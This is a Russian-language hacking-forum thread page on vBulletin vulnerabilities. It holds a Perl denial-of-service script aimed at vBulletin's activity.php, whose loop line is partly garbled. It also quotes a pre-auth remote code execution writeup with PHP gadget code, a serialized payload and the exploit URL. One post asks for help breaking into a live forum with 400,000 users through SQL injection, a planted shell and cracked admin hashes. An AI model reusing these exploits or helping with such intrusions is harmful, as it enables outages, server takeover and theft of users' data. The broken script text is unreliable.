HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу [Обзор уязвимостей vBulletin]
   
Ответ
Страница 16 из 17 « Первая < 6 12 13 14 15 16 17 >
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.03.2015, 11:13
Reset_
Познающий
Регистрация: 18.11.2008
Сообщений: 81
С нами: 9199765

Репутация: 86
По умолчанию
Залили другу через шелл такую штукуVbulletin activity Page Denial of Service,

сам не проверял кому то может пригодится

Цитата:
Сообщение от None  
#!/usr/bin/perl
#
# Vbulletin activity Page Denial of Service
# Code Written By silent
# Site : Www.IrIsT.Ir - Www.IrIsT.Ir/forum - Www.IrIsT.Ir/en
# Facebook Page : https://www.facebook.com/pages/IrIsT-Hacking-Security-Researcher-Group/488307267857573
# Greats : Amir , Codex , Beni_Vanda , sajjad13and11 , Andd All IrIsT Members
#
use IO::Socket;
$host = $ARGV[0];
$path = $ARGV[1];
if(!$ARGV[1])
{
print "\n\n";
print "\t Vbulletin activity Page Denial of Service\n";
print "\t Discoverd By silent \n";
print "\t Www.IrIsT.Ir \n";
print "\t =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-\n";
print "\t [host] [path] \n";
print "\t host.com /Vbulletin/\n";
print "\t =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=\n";
exit();
}
for($i=0; $inew(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
$post = "show=1%1%1%1%1%1%1%1%1%1%1%&time=1%1%1%1%1%1%1%1% 1%1%1%&sortby=1%1%1%1%1%1%1%1%1%1%1%";
$pack.= "POST " .$path. "/activity.php HTTP/1.1\r\n";
$pack.= "Host: " .$host. "\r\n";
$pack.= "User-Agent: Googlebot/2.1\r\n";
$pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
$pack.= "Content-Length: " .length($post). "\r\n\r\n";
$pack.= $post;
print $socket $pack;
syswrite STDOUT, "+";
}
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 29.06.2015, 10:04
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами: 7396886

Репутация: 231


По умолчанию
https://github.com/rezasp/vbscan/

Black Box vBulletin Vulnerability Scanner
 
Ответить с цитированием

  #3  
Старый 09.11.2015, 14:52
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами: 7396886

Репутация: 231


По умолчанию
vBulletin 5 PreAuth RCE writeup

Цитата:
Сообщение от None  
by @_cutz
vBulletin implements certain ajax API calls in /core/vb/api/, one of them is hook.php:
public function decodeArguments($arguments)
{
if ($args = @unserialize($arguments))
{
$result = '';
foreach ($args AS $varname => $value)
{
$result .= $varname;
Apart from the obvious unserialize() not much else happening there -- luckily we have in /core/vb/db/result.php:
class vB_dB_Result implements Iterator
{
...
public function rewind()
{
//no need to rerun the query if we are at the beginning of the recordset.
if ($this->bof)
{
return;
}
if ($this->recordset)
{
$this->db->free_result($this->recordset);
}
rewind() is the first function to get called when an Iterator object is accessed via foreach(). Then we have in /core/vb/database.php:
abstract class vB_Database
{
...
function free_result($queryresult)
{
$this->sql = '';
return @$this->functions['free_result']($queryresult);
}
Which gives easy RCE. Setup objects accordingly:
$ php functions['free_result'] = 'phpinfo';
}
}
class vB_dB_Result {
protected $db;
protected $recordset;
public function __construct()
{
$this->db = new vB_Database();
$this->recordset = 1;
}
}
print urlencode(serialize(new vB_dB_Result())) . "\n";
eof
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%0 0%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7 Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22 free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3 A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D
Just surf to:
http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s :5:"�*�db";O:11:"vB_Database":1:{s:9:"function s";a:1:{s:11:"free_result";s:7:"phpinfo";}}s:12:" *�recordset";i:1;}
The fix was just replacing the unserialize() with json_decode(). Btw this bug has been sitting in vBulletin for more than three years.
-- cutz
 
Ответить с цитированием

  #4  
Старый 09.01.2016, 06:35
indigo666
Новичок
Регистрация: 25.01.2013
Сообщений: 2
С нами: 6998006

Репутация: 0
По умолчанию
Кто-нибудь знает уязвимости в VB 3.8.7 / 4.2.x?
 
Ответить с цитированием

  #5  
Старый 10.01.2016, 01:18
user6334
Участник форума
Регистрация: 29.06.2015
Сообщений: 296
С нами: 5723606

Репутация: 12
По умолчанию
Цитата:
Сообщение от grimnir  

vBulletin 5 PreAuth RCE writeup
у меня так выводятся только кавычки, пробовал много
 
Ответить с цитированием

  #6  
Старый 04.05.2016, 19:11
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами: 7396886

Репутация: 231


По умолчанию
https://github.com/rezasp/vbscan

обновился

Цитата:
Сообщение от None  
OWASP VBScan 0.1.6 [Dennis Ritchie again]
  • Project name has been changed to "OWASP VBScan"
  • Added automatic vBulletin detection
  • Added robots.txt analyzer module
  • Added vbulletin LICENSE checker module
  • Optimized backup finder module
  • Optimized exploit check module
  • Fixed YUI 2.9.0 XSS false positive
  • Vbulletin version checker module bug fixed
  • "-h" switch not exist anymore
 
Ответить с цитированием

  #7  
Старый 30.10.2016, 20:43
EvilSQL
Новичок
Регистрация: 12.01.2016
Сообщений: 21
С нами: 5439926

Репутация: 3
По умолчанию
В курсе кто про Vbulliten 2.2.9 ? нашел там 4 SQL Injection но они все time based не могу раскрутить да и сурсов форума не найти.

PS там еще крутится 3.7.3 и аккаунт модератора есть.

на 3.7.3 admincp basic авторизация.

на 2.2.9 прост admincp шелл думаю залить труда не составит дырявый форум как друшлак

Опыт у меня большой, но ска скулю не могу раскрутить поможет, кто получить доступ?

PS,s 400 000 пользователей.

PS.S У меня сервис HashDB расшифровать не составит труда хеши админов.
 
Ответить с цитированием

  #8  
Старый 26.01.2018, 18:45
GrAmOzEkA
Участник форума
Регистрация: 25.06.2006
Сообщений: 220
С нами: 10461853

Репутация: 178
По умолчанию
Может кто запилить полный текст из https://xakep.ru/2017/12/27/vbulletin-5-exploit/
 
Ответить с цитированием

  #9  
Старый 26.01.2018, 20:17
crlf
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами: 5344886

Репутация: 441


По умолчанию
https://pste.eu/p/PPQZ.html



Странно, что используют логи сервера, по моему инклуд временных файлов будет намного универсальнее.
 
Ответить с цитированием

  #10  
Старый 26.01.2018, 20:54
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию
Цитата:
Сообщение от crlf  

https://pste.eu/p/PPQZ.html
Странно, что используют логи сервера, по моему инклуд временных файлов будет намного универсальнее.
это по типу как через phpinfo инклудят или какие то другие? что за файлы)?
 
Ответить с цитированием
Ответ
Страница 16 из 17 « Первая < 6 12 13 14 15 16 17 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
В ядре Linux появляется все больше уязвимостей dinar_007 Мировые новости. Обсуждения. 18 26.01.2007 16:21



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.